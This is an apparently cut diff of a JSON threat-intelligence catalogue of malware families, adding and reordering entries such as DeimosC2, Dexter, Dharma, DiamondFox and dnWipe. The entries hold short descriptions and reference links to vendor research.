+ "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f",
"https://www.elastic.co/blog/going-coast-to-coast-climbing-the-pyramid-with-the-deimos-implant"
],
"synonyms": [],
@@ -20169,6 +21464,19 @@
"uuid": "e369e45e-0e92-4811-822e-5e598285465e",
"value": "Deimos"
},
+ {
+ "description": "Trend Micro describes DeimosC2 as an open-source C&C framework that was released in June 2020. It is a fully-functional framework that allows for multiple attackers to access, create payloads for, and interact with victim computers. As a post-exploitation C&C framework, DeimosC2 will generate the payloads that need to be manually executed on computer servers that have been compromised through other means such as social engineering, exploitation, or brute-force attacks. Once it is deployed, the threat actors will gain the same access to the systems as the user account that the payload was executed as, either as an administrator or a regular user. Note that DeimosC2 does not perform active or privilege escalation of any kind.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.deimos_c2",
+ "https://www.trendmicro.com/en_us/research/22/k/deimosc2-what-soc-analysts-and-incident-responders-need-to-know.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1f1a894f-7a1b-4b98-9280-d33cf884a539",
+ "value": "DeimosC2"
+ },
{
"description": "",
"meta": {
@@ -20203,15 +21511,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "c76874cd-0d73-4cbf-8d39-a066900dd4ce",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "17429ed4-6106-4a28-9a76-f19cd476d94b",
"value": "Deprimon"
},
@@ -20220,8 +21519,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.deputydog",
- "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html",
"https://www.secureworks.com/research/threat-profiles/bronze-keystone",
+ "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html",
"https://web.archive.org/web/20130924130243/https://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html"
],
"synonyms": [],
@@ -20261,23 +21560,23 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf",
- "https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/",
- "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
- "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
- "https://web.archive.org/web/20180310053107/https://www.rsaconference.com/writable/presentations/file_upload/hta-w02-dissecting-derusbi.pdf",
- "https://attack.mitre.org/groups/G0001/",
- "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
- "https://cybergeeks.tech/analyzing-apt19-malware-using-a-step-by-step-method/",
"https://attack.mitre.org/groups/G0096",
- "https://web.archive.org/web/20151216071054/http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family",
- "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf",
- "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/",
- "https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html",
"https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
- "https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf"
+ "https://www.secureworks.com/research/threat-profiles/bronze-keystone",
+ "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf",
+ "https://attack.mitre.org/groups/G0001/",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
+ "https://www.secureworks.com/research/threat-profiles/bronze-firestone",
+ "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/",
+ "https://cybergeeks.tech/analyzing-apt19-malware-using-a-step-by-step-method/",
+ "https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/",
+ "https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf",
+ "https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf",
+ "https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html",
+ "https://web.archive.org/web/20151216071054/http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family",
+ "https://web.archive.org/web/20180310053107/https://www.rsaconference.com/writable/presentations/file_upload/hta-w02-dissecting-derusbi.pdf"
],
"synonyms": [
"PHOTO"
@@ -20292,7 +21591,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.desertblade",
- "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/"
+ "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
+ "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk"
],
"synonyms": [],
"type": []
@@ -20312,6 +21613,19 @@
"uuid": "44168d77-338d-46ad-a5f6-c17c2b6b0631",
"value": "Devil's Rat"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.devopt",
+ "https://www.zscaler.com/blogs/security-research/introducing-devopt-multifunctional-backdoor-arsenal"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "7d7a870d-725f-4ea3-b344-9c1ad0500618",
+ "value": "DevOpt"
+ },
{
"description": "",
"meta": {
@@ -20341,15 +21655,15 @@
"value": "Dexphot"
},
{
- "description": "",
+ "description": "Dexter is a computer virus or point of sale malware which infects computers running Microsoft Windows and was discovered by IT security firm Seculert, in December 2012. It infects PoS systems worldwide and steals sensitive information such as Credit Card and Debit Card information.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/",
"https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Dexter-Malware--Getting-Your-Hands-Dirty/",
+ "https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html",
"http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html",
"https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html",
- "https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/"
],
"synonyms": [
"LusyPOS"
@@ -20364,35 +21678,37 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma",
- "https://thedfirreport.com/2020/06/16/the-little-ransomware-that-couldnt-dharma/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
- "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
"https://www.youtube.com/watch?v=LUxOcpIRxmg",
- "https://twitter.com/JakubKroustek/status/1087808550309675009",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
"https://www.advanced-intel.com/post/inside-phobos-ransomware-dharma-past-underground",
- "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/",
- "https://www.group-ib.com/media/iran-cybercriminals/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/dharma-ransomware-uses-av-tool-to-distract-from-malicious-activities/",
- "https://cyberveille-sante.gouv.fr/cyberveille-sante/1821-france-retour-dexperience-suite-une-attaque-par-rancongiciel-contre-une",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.zscaler.com/blogs/security-research/ransomware-delivered-using-rdp-brute-force-attack",
- "https://www.acronis.com/en-us/articles/Dharma-ransomware/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware",
- "https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/",
- "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware",
- "https://www.carbonblack.com/2018/07/10/carbon-black-tau-threat-analysis-recent-dharma-ransomware-highlights-attackers-continued-use-open-source-tools/",
- "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
"https://www.bleepingcomputer.com/news/security/new-arena-crysis-ransomware-variant-released/",
+ "https://www.zscaler.com/blogs/security-research/ransomware-delivered-using-rdp-brute-force-attack",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
"https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
"https://news.sophos.com/en-us/2020/08/12/color-by-numbers-inside-a-dharma-ransomware-as-a-service-attack/",
- "https://securelist.com/cis-ransomware/104452/"
+ "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
+ "https://nakedsecurity.sophos.com/2018/09/11/the-rise-of-targeted-ransomware/",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
+ "https://www.acronis.com/en-us/articles/Dharma-ransomware/",
+ "https://www.carbonblack.com/2018/07/10/carbon-black-tau-threat-analysis-recent-dharma-ransomware-highlights-attackers-continued-use-open-source-tools/",
+ "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://securelist.com/cis-ransomware/104452/",
+ "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware",
+ "https://cyberveille-sante.gouv.fr/cyberveille-sante/1821-france-retour-dexperience-suite-une-attaque-par-rancongiciel-contre-une",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/",
+ "https://thedfirreport.com/2020/06/16/the-little-ransomware-that-couldnt-dharma/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://twitter.com/JakubKroustek/status/1087808550309675009",
+ "https://www.group-ib.com/media/iran-cybercriminals/",
+ "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/dharma-ransomware-uses-av-tool-to-distract-from-malicious-activities/"
],
"synonyms": [
"Arena",
@@ -20406,18 +21722,18 @@
"value": "Dharma"
},
{
- "description": "",
+ "description": "According to PCrisk, DiamondFox is highly modular malware offered as malware-as-a-service, and is for sale on various hacker forums. Therefore, cyber criminals who are willing to use DiamondFox do not necessarily require any technical knowledge to perform their attacks.\r\n\r\nOnce purchased, this malware can be used to log keystrokes, steal credentials (e.g., usernames, email addresses, passwords), hijack cryptocurrency wallets, perform distributed denial of service (DDoS) attacks, and to carry out other malicious tasks.\r\n\r\nDiamondFox allows cyber criminals to choose which plug-ins to keep activated and see infection statistics in real-time.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.diamondfox",
- "https://github.com/samoceyn/Diamondfox-Technical-Analysis-Report/blob/6375314ccecdf3fe450f975a384bcc1b16f068a8/D%C4%B0AMONDFOX%20Technical%20Analysis%20Report.PDF",
- "https://www.scmagazine.com/inside-diamondfox/article/578478/",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/",
"http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/",
- "https://blog.cylance.com/a-study-in-bots-diamondfox",
- "https://fr3d.hk/blog/diamondfox-bank-robbers-will-be-replaced",
"https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/",
- "https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/"
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://fr3d.hk/blog/diamondfox-bank-robbers-will-be-replaced",
+ "https://blog.cylance.com/a-study-in-bots-diamondfox",
+ "https://www.scmagazine.com/inside-diamondfox/article/578478/",
+ "https://github.com/samoceyn/Diamondfox-Technical-Analysis-Report/blob/6375314ccecdf3fe450f975a384bcc1b16f068a8/D%C4%B0AMONDFOX%20Technical%20Analysis%20Report.PDF"
],
"synonyms": [
"Crystal",
@@ -20434,18 +21750,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.diavol",
- "https://www.bleepingcomputer.com/news/security/trickbot-gang-developer-arrested-when-trying-to-leave-korea/",
- "https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider",
- "https://chuongdong.com/reverse%20engineering/2021/12/17/DiavolRansomware/",
"https://medium.com/walmartglobaltech/diavol-the-enigma-of-ransomware-1fd78ffda648",
- "https://securityintelligence.com/posts/analysis-of-diavol-ransomware-link-trickbot-gang/",
- "https://thedfirreport.com/2021/12/13/diavol-ransomware/",
- "https://heimdalsecurity.com/blog/is-diavol-ransomware-connected-to-wizard-spider/",
"https://arcticwolf.com/resources/blog/karakurt-web",
- "https://www.binarydefense.com/threat_watch/new-ransomware-diavol-being-dropped-by-trickbot/",
- "https://www.scythe.io/library/adversary-emulation-diavol-ransomware-threatthursday",
+ "https://chuongdong.com/reverse%20engineering/2021/12/17/DiavolRansomware/",
"https://www.bleepingcomputer.com/news/security/fbi-links-diavol-ransomware-to-the-trickbot-cybercrime-group/",
+ "https://www.fortinet.com/blog/threat-research/diavol-new-ransomware-used-by-wizard-spider",
+ "https://thedfirreport.com/2021/12/13/diavol-ransomware/",
+ "https://securityintelligence.com/posts/analysis-of-diavol-ransomware-link-trickbot-gang/",
+ "https://medium.com/walmartglobaltech/diavol-resurfaces-91dd93c7d922",
+ "https://www.bleepingcomputer.com/news/security/trickbot-gang-developer-arrested-when-trying-to-leave-korea/",
+ "https://www.scythe.io/library/adversary-emulation-diavol-ransomware-threatthursday",
"https://www.ic3.gov/Media/News/2022/220120.pdf",
+ "https://www.binarydefense.com/threat_watch/new-ransomware-diavol-being-dropped-by-trickbot/",
+ "https://heimdalsecurity.com/blog/is-diavol-ransomware-connected-to-wizard-spider/",
"https://www.bleepingcomputer.com/news/security/diavol-ransomware-sample-shows-stronger-connection-to-trickbot-gang/"
],
"synonyms": [],
@@ -20459,8 +21776,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dilljuice",
- "https://securelist.com/apt-trends-report-q1-2021/101967/",
- "https://threatvector.cylance.com/en_us/home/threat-spotlight-menupass-quasarrat-backdoor.html"
+ "https://threatvector.cylance.com/en_us/home/threat-spotlight-menupass-quasarrat-backdoor.html",
+ "https://securelist.com/apt-trends-report-q1-2021/101967/"
],
"synonyms": [],
"type": []
@@ -20491,15 +21808,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "9fed4326-a7ad-4c58-ab87-90ac3957d82f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "8f5ce8a6-c5fe-4c62-b25b-6ce0f3b724c5",
"value": "Dimnie"
},
@@ -20534,12 +21842,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dirtymoe",
- "https://decoded.avast.io/martinchlumecky/dirtymoe-rootkit-driver/",
- "https://decoded.avast.io/martinchlumecky/dirtymoe-1/",
"https://decoded.avast.io/martinchlumecky/dirtymoe-4/",
- "https://decoded.avast.io/martinchlumecky/dirtymoe-5/",
+ "https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html",
"https://decoded.avast.io/martinchlumecky/dirtymoe-3/",
- "https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html"
+ "https://decoded.avast.io/martinchlumecky/dirtymoe-5/",
+ "https://decoded.avast.io/martinchlumecky/dirtymoe-1/",
+ "https://decoded.avast.io/martinchlumecky/dirtymoe-rootkit-driver/"
],
"synonyms": [],
"type": []
@@ -20552,8 +21860,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dispcashbr",
- "https://twitter.com/r3c0nst/status/1232944566208286720",
- "https://insights.oem.avira.com/atm-malware-targets-wincor-and-diebold-atms/"
+ "https://insights.oem.avira.com/atm-malware-targets-wincor-and-diebold-atms/",
+ "https://twitter.com/r3c0nst/status/1232944566208286720"
],
"synonyms": [],
"type": []
@@ -20579,29 +21887,30 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack",
- "https://securelist.com/shamoon-the-wiper-copycats-at-work/",
- "https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ad6f8259-2bb4-4f7f-b8e1-710b35a4cbed&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
+ "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
"https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf",
"https://malwareindepth.com/shamoon-2012/",
- "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis",
- "https://content.fireeye.com/m-trends/rpt-m-trends-2017",
- "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf",
- "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
- "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail",
"https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/",
+ "https://content.fireeye.com/m-trends/rpt-m-trends-2017",
"http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412",
- "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/",
- "https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/",
- "https://unit42.paloaltonetworks.com/unit42-second-wave-shamoon-2-attacks-identified/",
- "https://web.archive.org/web/20120818235442/https://www.symantec.com/connect/blogs/shamoon-attacks",
- "https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf",
"http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html",
+ "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware",
+ "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon",
+ "https://web.archive.org/web/20120818235442/https://www.symantec.com/connect/blogs/shamoon-attacks",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ad6f8259-2bb4-4f7f-b8e1-710b35a4cbed&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
- "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5758557d-6e3a-4174-90f3-fa92a712ecd9&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
- "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware"
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
+ "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail",
+ "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
+ "https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon",
+ "https://securelist.com/shamoon-the-wiper-copycats-at-work/",
+ "https://unit42.paloaltonetworks.com/unit42-second-wave-shamoon-2-attacks-identified/",
+ "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf",
+ "https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf",
+ "https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/"
],
"synonyms": [
"Shamoon"
@@ -20616,11 +21925,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.divergent",
- "https://blog.talosintelligence.com/2019/09/divergent-analysis.html",
"https://documents.trendmicro.com/assets/Tech-Brief-New-Fileless-Botnet-Novter-Distributed-by-KovCoreG-Malvertising-Campaign.pdf",
+ "https://www.microsoft.com/security/blog/2019/09/26/bring-your-own-lolbin-multi-stage-fileless-nodersok-campaign-delivers-rare-node-js-based-malware/",
+ "https://blog.talosintelligence.com/2019/09/divergent-analysis.html",
"https://www.cert-pa.it/notizie/devergent-malware-fileless/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-fileless-botnet-novter-distributed-by-kovcoreg-malvertising-campaign/",
- "https://www.microsoft.com/security/blog/2019/09/26/bring-your-own-lolbin-multi-stage-fileless-nodersok-campaign-delivers-rare-node-js-based-malware/"
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-fileless-botnet-novter-distributed-by-kovcoreg-malvertising-campaign/"
],
"synonyms": [
"Novter"
@@ -20648,8 +21957,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dma_locker",
- "https://blog.malwarebytes.com/threat-analysis/2016/05/dma-locker-4-0-known-ransomware-preparing-for-a-massive-distribution/",
"https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/",
+ "https://blog.malwarebytes.com/threat-analysis/2016/05/dma-locker-4-0-known-ransomware-preparing-for-a-massive-distribution/",
"https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-strikes-back/"
],
"synonyms": [],
@@ -20702,11 +22011,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dnsmessenger",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
- "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/",
- "https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html",
"https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
+ "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
+ "https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html",
"https://blog.talosintelligence.com/2017/03/dnsmessenger.html",
+ "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/",
"http://wraithhacker.com/2017/10/11/more-info-on-evolved-dnsmessenger/"
],
"synonyms": [
@@ -20722,19 +22031,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dnspionage",
- "https://www.lastline.com/labsblog/threat-actor-cold-river-network-traffic-analysis-and-a-deep-dive-on-agent-drable/",
- "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html",
"https://www.secureworks.com/research/threat-profiles/cobalt-edgewater",
- "https://nsfocusglobal.com/apt34-event-analysis-report/",
"https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/",
- "https://marcoramilli.com/2019/04/23/apt34-webmask-project/",
- "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html",
- "https://blog-cert.opmd.fr/dnspionage-focus-on-internal-actions/",
- "https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html",
- "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.us-cert.gov/ncas/alerts/AA19-024A"
+ "https://www.lastline.com/labsblog/threat-actor-cold-river-network-traffic-analysis-and-a-deep-dive-on-agent-drable/",
+ "https://www.zdnet.com/article/source-code-of-iranian-cyber-espionage-tools-leaked-on-telegram/",
+ "https://blog-cert.opmd.fr/dnspionage-focus-on-internal-actions/",
+ "https://www.us-cert.gov/ncas/alerts/AA19-024A",
+ "https://marcoramilli.com/2019/04/23/apt34-webmask-project/",
+ "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html",
+ "https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html",
+ "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html",
+ "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/",
+ "https://nsfocusglobal.com/apt34-event-analysis-report/"
],
"synonyms": [
"Agent Drable",
@@ -20746,6 +22055,19 @@
"uuid": "ef46bd90-91d0-4208-b3f7-08b65acb8438",
"value": "DNSpionage"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnwipe",
+ "https://www.trellix.com/en-us/about/newsroom/stories/research/wipermania-an-all-you-can-wipe-buffet.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0f6c16ec-e15c-480b-a5d3-cf5efe71821a",
+ "value": "dnWipe"
+ },
{
"description": "DogHousePower is a PyInstaller-based ransomware targeting web and database servers. It is delivered through a PowerShell downloader and was hosted on Github.",
"meta": {
@@ -20761,13 +22083,28 @@
"uuid": "14d3518a-d8cb-4fbd-80aa-8bec4fc8ad13",
"value": "DogHousePower"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.domino",
+ "https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-domino-backdoor/",
+ "https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-domino-backdoor"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "37169b2f-344e-4913-ab91-d447d597ffa7",
+ "value": "Minodo"
+ },
{
